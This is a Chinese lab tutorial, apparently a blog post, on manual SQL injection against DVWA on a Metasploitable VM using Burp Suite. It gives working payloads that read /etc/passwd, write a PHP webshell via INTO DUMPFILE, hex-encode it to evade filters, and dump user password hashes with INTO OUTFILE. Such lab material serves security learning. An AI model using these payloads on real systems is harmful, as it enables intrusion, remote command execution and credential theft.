SQL手工注入探索旅程(二)

SQL手工注入探索旅程(一)

实验环境:
kali:192.168.128.128/24
metasploitable:192.168.128.129/24

首先我们将metasploitable中的dvwa安全等级设置为low
在这里插入图片描述
然后我们使用burpsuite去利用SQL注入漏洞向目标服务器发送get请求获取数据
在kali的火狐浏览器中配置代理功能
在这里插入图片描述
我们在SQL Injection那个漏洞中输入任意数字,比如输1,确保burpsuite中截断代理功能是打开的,便可以收到其发送给服务端的GET请求
在这里插入图片描述
我们将刚刚获取到的GET请求发送到Repeater工具中去手工修改HTTP请求
在这里插入图片描述
利用Repeater工具中的Params(参数)这个板块将URL中的所有的参数按行列举出来
在这里插入图片描述
双击参数id所对应的value修改为下面指令的内容,点击go,在Response(回复)那个界面的Render板块可以看到其结果,可以说非常方便

' union select null,load_file('/etc/passwd')--+
#显示使用load_file函数调用系统命令,详情查看SQL手工注入探索旅程(一)

在这里插入图片描述
在raw中也可以查看到在这里插入图片描述

向服务器上传PHP一句话木马
其指令为:

' union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE 'a.php' --+

注:<?php passthru($_GET['cmd']);?>该php代码表示将用户get请求的值通过passthru函数,将值在操作系统中调用,比如cmd=ls列出当前目录的文件
通过MySQL中的DUNPFILE函数将该PHP木马导出到a.php文件中,

DUMPFILE函数只能将一条数据原封不动的写入到文件中去,
通常写入第二条的时候出错,但第二条内容是可以被写入文件中的

我们不能将该木马写入到指定的目录中去,因为我们目前说使用的是MySQL数据库默认的用户,只得将文件a.php保存在数据库默认的用户的主目录下面
在这里插入图片描述
注:双击两次go,确保文件被上传到目标web服务器上
在这里插入图片描述
我们只能通过SQL注入将木马写入到mysql的主目录中,但无法访问此木马文件,而我们又没有权限将其写入到/var/www目录下,/var/www下是www-data的主目录,我们当前的用户为mysql用户.

由于dvwa网站也有文件包含漏洞,我们将其和SQL注入漏洞结合起来

简单说说文件上传漏洞:
文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。

那么我们通过SQL注入漏洞向服务器上传php木马到tmp目录下,其实也就是实施了文件长传漏洞
在这里插入图片描述
在这里插入图片描述
使用文件上传漏洞也可以获取系统信息
在这里插入图片描述
注:这个进程为启动mysql服务的进程,如果用mysql用户启动的,那么经过sql注入之后得到的权限就是Mysql这个用户的权限,如果是root启动的,那么权限就是root的权限在这里插入图片描述

将php一句话木马,其代码转换成16进值的字符,防止被系统过滤
在这里插入图片描述

在Linux下的xxd 命令用于将文件的内容以二进制或十六进制出来
其参数-b表示以2进值的形式输出
-p 文本16进制形式
-ps 表示只显示编码之后的内容,不显示原内容,默认左边为编码后的内容,右边是文件原内容
-l 显示字节数
-u 大写16进制(默认为小写)
-i 可以生成c语言头文件定义
-c 指定一行显示多少字节,默认为16
在这里插入图片描述
但是经过编码的时候,每一行都有一个分隔符,这样会对上传的内容,所以我们需要对刚刚得到的内容进行处理,使用tr -d '\n’删除换行符
在这里插入图片描述

然后将其16进值的木马程序去替换php代码,
具体步骤为:将原代码删除,用括号将16进值的木马括起来,最前方写上0x告诉系统为16进值的数值
在这里插入图片描述

将目标服务器的数据库的内容下载到目标服务器本地,进行拖库
其指令为:

'union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+

在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值